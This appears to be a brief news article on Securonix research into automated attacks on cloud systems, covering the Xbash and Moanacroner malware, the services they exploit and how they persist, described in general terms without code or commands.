Automated attacks target cloud infrastructure
Enterprises continue to grow their cloud usage, but this inevitably presents challenges when it comes to keeping systems secure.
New research from Securonix Threat Research highlights an increase in automated attacks targeting cloud infrastructures.
Some of the attacks, for example Moanacroner, are trivial, targeted single-platform attacks where the focus is mainly on cryptomining. Others, are multi-platform threats where multiple functionalities (cryptomining, ransomware, botnet/worms, etc.) are combined as part of the same malicious threat, for example Xbash.
The researchers note that, "In most cases, the focus of the attacks is on installing a second-stage payload for cryptomining and/or remote access. In other cases, the malware propagates and infects the exposed services, removes data, and installs second-stage cryptomining and ransomware payloads. For example, in the case of Xbash (which was reported a few months ago), the malware deletes the databases instead of encrypting them, and does not have any functionality to backup/recover the files."
The attacks have been spreading via the Xbash botnet which scans addresses for services running on particular ports. It then either carries out a brute force attack against weak passwords, or uses vulnerabilities in Hadoop YARN Resource Manager, Redis, and ActiveMQ.
In some cases the attacks have been delivered using remote commands, Hadoop unauthenticated command execution and Redis remote command execution being two of the methods highlighted. They also attempt to gain persistence by adding cronjob entries on Linux systems or startup items in Windows.
You can find more details of the attacks and how they work on the Securonix website.